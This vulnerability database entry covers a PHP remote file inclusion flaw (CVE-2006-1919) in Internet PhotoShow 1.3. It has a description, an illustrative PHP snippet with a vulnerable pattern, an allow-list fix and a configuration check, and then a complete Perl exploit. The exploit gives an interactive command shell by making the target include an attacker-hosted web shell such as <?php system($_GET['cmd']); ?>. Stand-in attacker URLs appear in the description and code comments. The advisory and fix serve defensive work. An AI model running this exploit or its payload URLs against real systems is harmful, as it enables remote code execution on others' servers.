Internet PhotoShow index.php Remote File Inclusion Vulnerability

Vulnerability ID: 1110089    Type: Input validation
Published: 2006-04-18    Updated: 2006-04-24
CVE: CVE-2006-1919    CNNVD ID: CNNVD-200604-370
Platform: PHP    CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/1694
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-370
|Vulnerability Details
index.php in Internet PhotoShow 1.3 contains a PHP remote file inclusion vulnerability: the value of the page parameter is handed to the interpreter's include mechanism without validation, so a remote attacker who supplies a URL in the page parameter (for example page=http://attacker-host/shell.txt) can have the server fetch that file and execute the arbitrary PHP code it contains. Exploitation over HTTP depends on the PHP configuration allowing URL wrappers in include: allow_url_fopen on PHP releases before 5.2, and allow_url_include (off by default) from 5.2 onward. Checking that setting is the first thing to do when triaging a host running this software.
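The following is an added example, not Internet PhotoShow's own source. The vulnerable function is an assumed reconstruction of the pattern the advisory describes (a raw page parameter passed to include); the allow-list resolver beside it is one standard fix, and the last function is a deployment check for the interpreter setting that makes remote inclusion possible. Page names, file paths and function names are illustrative (PHP 7.1 or later for the type declarations).

```php
<?php
// --- vulnerable pattern (assumed reconstruction; do not deploy) ---
function vulnerable_include_target(array $get): string
{
    // Whatever arrives in ?page= is returned unchanged and then passed to
    // include(). With URL wrappers enabled for include, a value such as
    //   http://attacker.example/shell.txt?&cmd=id
    // makes PHP fetch shell.txt and execute it with the attacker's command.
    return $get['page'];
}

// --- hardened: resolve the request against a fixed allow-list ---
// Only these keys are accepted; the client never supplies a path or URL.
const PAGES = [
    'home'    => 'pages/home.php',
    'gallery' => 'pages/gallery.php',
    'about'   => 'pages/about.php',
];

function resolve_page(array $get, string $baseDir): ?string
{
    $key = isset($get['page']) ? (string) $get['page'] : 'home';
    if (!array_key_exists($key, PAGES)) {
        return null;                       // unknown key: nothing is included
    }
    return $baseDir . '/' . PAGES[$key];   // server-controlled path only
}

// --- deployment check: is remote inclusion possible at all? ---
function remote_include_enabled(): bool
{
    // allow_url_include exists from PHP 5.2; older builds honour
    // allow_url_fopen for include(), so fall back to that directive.
    $value = ini_get('allow_url_include');
    if ($value === false) {
        $value = ini_get('allow_url_fopen');
    }
    return filter_var($value, FILTER_VALIDATE_BOOLEAN);
}

// Usage in a front controller:
if (PHP_SAPI !== 'cli') {
    $target = resolve_page($_GET, __DIR__);
    if ($target === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $target;
}
```

With the allow-list in place the exploit URL shape used below (page=http://...?&cmd=...) is rejected before any include happens; remote_include_enabled() returning false is the belt-and-braces setting that keeps a future unvalidated include from turning into remote code execution.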
|Exploit
#!/usr/bin/perl
#
# Exploit by Hessam-x (www.hessamx.net)
#
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                 DeltaHAcking Team                  #
#           website: www.deltahacking.com            #
######################################################
#  Internet PhotoShow Remote File Inclusion Exploit  #
######################################################
#
# Usage : perl hx.pl [host] [cmd shell location] [cmd shell variable]
# E.g.  : perl hx.pl http://www.milw0rm.com http://www.milw0rm.com/shell.txt cmd
#
# The cmd shell is a text file hosted by the attacker that executes the
# value of the named variable, e.g. <?php system($_GET['cmd']); ?>.
# Each command typed at the prompt is sent as
#   <host>/index.php?page=<cmd shell location>?&<variable>=<command>
# index.php passes the page parameter to include(), so the remote file
# is fetched and its PHP runs with the attacker's command.
#
# upload a shell with this xpl:
# wget http://shell location/

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape qw(uri_escape);

print "-------------------------------------------\n";
print "=             Internet PhotoShow          =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";

my ($bPath, $cmdo, $bcmd) = @ARGV;

usage() unless defined $bPath && $bPath =~ m{^https?://}
             && defined $cmdo  && $cmdo  =~ m{^https?://}
             && defined $bcmd  && length $bcmd;

# index.php is appended directly, so the host must end with a slash.
$bPath .= '/' unless $bPath =~ m{/$};

my $ua = LWP::UserAgent->new() or die "\n[-] Could not create user agent !\n";

while (1) {
    print "Hessam-x\@PhotoShow \$";
    my $cmd = <STDIN>;
    last unless defined $cmd;          # EOF (Ctrl-D) ends the session
    chomp $cmd;

    if ($cmd eq '') {
        print "\n[!] Please type a Command\n\n";
        next;
    }

    # uri_escape so spaces, & and ; in the command survive the query string.
    my $url = $bPath . 'index.php?page=' . $cmdo . '?&' . $bcmd . '=' . uri_escape($cmd);
    my $res = $ua->request(HTTP::Request->new(GET => $url));
    my $return = $res->content;

    if ($return =~ /failed to open stream: HTTP request failed!/) {
        # include() on the target could not fetch the cmd shell from its host
        print "\n[-] Could Not Connect to cmd Host\n";
        exit;
    }
    elsif ($return =~ /^<b>Fatal.error/) {
        print "\n[-] Invalid Command\n";
        next;
    }

    print "\r\n$return\n\r";
}

sub usage {
    print "[!] Usage : hx.pl [host] [cmd shell location] [cmd shell variable]\n";
    print " - E.g : hx.pl http://www.milw0rm.com http://www.milw0rm.com/shell.txt cmd\n";
    exit();
}

# milw0rm.com [2006-04-18]
|References

Source: VUPEN
Name: ADV-2006-1417
Link: http://www.frsirt.com/english/advisories/2006/1417
Source: SECUNIA
Name: 19726
Link: http://secunia.com/advisories/19726
Source: MILW0RM
Name: 1694
Link: http://milw0rm.com/exploits/1694
Source: XF
Name: ip-index-file-include(25937)
Link: http://xforce.iss.net/xforce/xfdb/25937
Source: BID
Name: 17620
Link: http://www.securityfocus.com/bid/17620
Source: OSVDB
Name: 24743
Link: http://www.osvdb.org/24743